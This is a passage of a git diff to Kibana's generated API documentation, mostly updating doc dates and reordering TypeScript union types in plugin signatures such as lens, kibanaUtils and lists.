"lens", - "path": "x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx" - }, { "plugin": "observability", "path": "x-pack/plugins/observability/public/application/index.tsx" @@ -4034,7 +4010,7 @@ "signature": [ "Omit<", "EuiPageProps", - ", \"paddingSize\"> & { template?: \"default\" | \"empty\" | \"centeredBody\" | \"centeredContent\" | undefined; paddingSize?: \"none\" | \"s\" | \"m\" | \"l\" | undefined; pageSideBar?: React.ReactNode; pageSideBarProps?: ", + ", \"paddingSize\"> & { template?: \"default\" | \"empty\" | \"centeredBody\" | \"centeredContent\" | undefined; paddingSize?: \"none\" | \"m\" | \"s\" | \"l\" | undefined; pageSideBar?: React.ReactNode; pageSideBarProps?: ", "EuiPageSideBarProps", " | undefined; pageHeader?: ", "EuiPageHeaderProps", diff --git a/api_docs/kibana_react.mdx b/api_docs/kibana_react.mdx index 41fd6d926039c..dce8d8401c82e 100644 --- a/api_docs/kibana_react.mdx +++ b/api_docs/kibana_react.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kibanaReact title: "kibanaReact" image: https://source.unsplash.com/400x175/?github description: API docs for the kibanaReact plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'kibanaReact'] --- import kibanaReactObj from './kibana_react.devdocs.json'; diff --git a/api_docs/kibana_utils.devdocs.json b/api_docs/kibana_utils.devdocs.json index 3839c7eb3e7c4..5e09ebc028a86 100644 --- a/api_docs/kibana_utils.devdocs.json +++ b/api_docs/kibana_utils.devdocs.json @@ -6623,7 +6623,7 @@ "signature": [ "(history: Pick<", "History", - ", \"replace\" | \"location\">) => void" + ", \"location\" | \"replace\">) => void" ], "path": "src/plugins/kibana_utils/public/plugin.ts", "deprecated": false, @@ -6638,7 +6638,7 @@ "signature": [ "Pick<", "History", - ", \"replace\" | \"location\">" + ", \"location\" | \"replace\">" ], "path": "src/plugins/kibana_utils/public/plugin.ts", "deprecated": false, diff --git a/api_docs/kibana_utils.mdx b/api_docs/kibana_utils.mdx index 18745d1c7c935..cba11c205cd12 100644 --- a/api_docs/kibana_utils.mdx +++ b/api_docs/kibana_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kibanaUtils title: "kibanaUtils" image: https://source.unsplash.com/400x175/?github description: API docs for the kibanaUtils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'kibanaUtils'] --- import kibanaUtilsObj from './kibana_utils.devdocs.json'; diff --git a/api_docs/kubernetes_security.mdx b/api_docs/kubernetes_security.mdx index 17bba5735a1be..f15b9c6bfb7c3 100644 --- a/api_docs/kubernetes_security.mdx +++ b/api_docs/kubernetes_security.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kubernetesSecurity title: "kubernetesSecurity" image: https://source.unsplash.com/400x175/?github description: API docs for the kubernetesSecurity plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'kubernetesSecurity'] --- import kubernetesSecurityObj from './kubernetes_security.devdocs.json'; diff --git a/api_docs/lens.devdocs.json b/api_docs/lens.devdocs.json index 11b085917260d..4746d5f7c2957 100644 --- a/api_docs/lens.devdocs.json +++ b/api_docs/lens.devdocs.json @@ -1235,7 +1235,7 @@ "label": "xScaleType", "description": [], "signature": [ - "\"time\" | \"linear\" | \"ordinal\"" + "\"linear\" | \"time\" | \"ordinal\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false @@ -1302,7 +1302,13 @@ "label": "decorations", "description": [], "signature": [ - "DataDecorationConfigResult", + { + "pluginId": "expressionXY", + "scope": "common", + "docId": "kibExpressionXYPluginApi", + "section": "def-common.DataDecorationConfigResult", + "text": "DataDecorationConfigResult" + }, "[] | undefined" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", @@ -3779,7 +3785,7 @@ "\nThe change type indicates what was changed in this table compared to the currently active table of this layer." ], "signature": [ - "\"initial\" | \"layers\" | \"unchanged\" | \"reduced\" | \"extended\" | \"reorder\"" + "\"layers\" | \"initial\" | \"unchanged\" | \"reduced\" | \"extended\" | \"reorder\"" ], "path": "x-pack/plugins/lens/public/types.ts", "deprecated": false @@ -3835,7 +3841,7 @@ "label": "params", "description": [], "signature": [ - "{ size: number; accuracyMode?: boolean | undefined; include?: number[] | string[] | undefined; exclude?: number[] | string[] | undefined; includeIsRegex?: boolean | undefined; excludeIsRegex?: boolean | undefined; orderBy: { type: \"alphabetical\"; fallback?: boolean | undefined; } | { type: \"rare\"; maxDocCount: number; } | { type: \"column\"; columnId: string; } | { type: \"custom\"; }; orderAgg?: ", + "{ size: number; accuracyMode?: boolean | undefined; include?: string[] | number[] | undefined; exclude?: string[] | number[] | undefined; includeIsRegex?: boolean | undefined; excludeIsRegex?: boolean | undefined; orderBy: { type: \"alphabetical\"; fallback?: boolean | undefined; } | { type: \"rare\"; maxDocCount: number; } | { type: \"column\"; columnId: string; } | { type: \"custom\"; }; orderAgg?: ", { "pluginId": "lens", "scope": "public", @@ -7921,7 +7927,7 @@ "label": "XScaleType", "description": [], "signature": [ - "\"time\" | \"linear\" | \"ordinal\"" + "\"linear\" | \"time\" | \"ordinal\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false, @@ -7999,7 +8005,7 @@ "label": "YScaleType", "description": [], "signature": [ - "\"log\" | \"time\" | \"linear\" | \"sqrt\"" + "\"linear\" | \"log\" | \"time\" | \"sqrt\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false, @@ -9115,7 +9121,7 @@ "label": "OperationTypePost712", "description": [], "signature": [ - "\"min\" | \"max\" | \"sum\" | \"filters\" | \"count\" | \"date_histogram\" | \"percentile\" | \"average\" | \"range\" | \"terms\" | \"median\" | \"cumulative_sum\" | \"moving_average\" | \"unique_count\" | \"last_value\" | \"counter_rate\" | \"differences\"" + "\"range\" | \"min\" | \"max\" | \"filters\" | \"count\" | \"date_histogram\" | \"percentile\" | \"sum\" | \"average\" | \"terms\" | \"median\" | \"cumulative_sum\" | \"moving_average\" | \"unique_count\" | \"last_value\" | \"counter_rate\" | \"differences\"" ], "path": "x-pack/plugins/lens/server/migrations/types.ts", "deprecated": false, @@ -9129,7 +9135,7 @@ "label": "OperationTypePre712", "description": [], "signature": [ - "\"min\" | \"max\" | \"sum\" | \"filters\" | \"count\" | \"date_histogram\" | \"percentile\" | \"range\" | \"terms\" | \"avg\" | \"median\" | \"cumulative_sum\" | \"derivative\" | \"moving_average\" | \"last_value\" | \"counter_rate\" | \"cardinality\"" + "\"range\" | \"min\" | \"max\" | \"filters\" | \"count\" | \"date_histogram\" | \"percentile\" | \"sum\" | \"terms\" | \"avg\" | \"median\" | \"cumulative_sum\" | \"derivative\" | \"moving_average\" | \"last_value\" | \"counter_rate\" | \"cardinality\"" ], "path": "x-pack/plugins/lens/server/migrations/types.ts", "deprecated": false, diff --git a/api_docs/lens.mdx b/api_docs/lens.mdx index 3aa633d49f67d..80f60ed7d605e 100644 --- a/api_docs/lens.mdx +++ b/api_docs/lens.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/lens title: "lens" image: https://source.unsplash.com/400x175/?github description: API docs for the lens plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'lens'] --- import lensObj from './lens.devdocs.json'; diff --git a/api_docs/license_api_guard.mdx b/api_docs/license_api_guard.mdx index b19b1f57bf2d4..0ca74c7edafa8 100644 --- a/api_docs/license_api_guard.mdx +++ b/api_docs/license_api_guard.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/licenseApiGuard title: "licenseApiGuard" image: https://source.unsplash.com/400x175/?github description: API docs for the licenseApiGuard plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'licenseApiGuard'] --- import licenseApiGuardObj from './license_api_guard.devdocs.json'; diff --git a/api_docs/license_management.mdx b/api_docs/license_management.mdx index a62273cd270eb..8147033607189 100644 --- a/api_docs/license_management.mdx +++ b/api_docs/license_management.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/licenseManagement title: "licenseManagement" image: https://source.unsplash.com/400x175/?github description: API docs for the licenseManagement plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'licenseManagement'] --- import licenseManagementObj from './license_management.devdocs.json'; diff --git a/api_docs/licensing.mdx b/api_docs/licensing.mdx index 5b2c54cf229de..dc71276bb7c66 100644 --- a/api_docs/licensing.mdx +++ b/api_docs/licensing.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/licensing title: "licensing" image: https://source.unsplash.com/400x175/?github description: API docs for the licensing plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'licensing'] --- import licensingObj from './licensing.devdocs.json'; diff --git a/api_docs/lists.devdocs.json b/api_docs/lists.devdocs.json index 6dc92b34341c1..5d10e9c1761df 100644 --- a/api_docs/lists.devdocs.json +++ b/api_docs/lists.devdocs.json @@ -311,7 +311,7 @@ "label": "exceptionItems", "description": [], "signature": [ - "({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" + "({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" ], "path": "x-pack/plugins/lists/public/exceptions/components/builder/exception_items_renderer.tsx", "deprecated": false @@ -324,7 +324,7 @@ "label": "exceptionsToDelete", "description": [], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]" ], "path": "x-pack/plugins/lists/public/exceptions/components/builder/exception_items_renderer.tsx", "deprecated": false @@ -585,7 +585,7 @@ "signature": [ "({ itemId, id, namespaceType, }: ", "GetExceptionListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -659,7 +659,7 @@ "signature": [ "({ comments, description, entries, itemId, meta, name, osTypes, tags, type, }: ", "CreateEndpointListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -695,7 +695,7 @@ "signature": [ "({ _version, comments, description, entries, id, itemId, meta, name, osTypes, tags, type, }: ", "UpdateEndpointListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -731,7 +731,7 @@ "signature": [ "({ itemId, id, }: ", "GetEndpointListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: 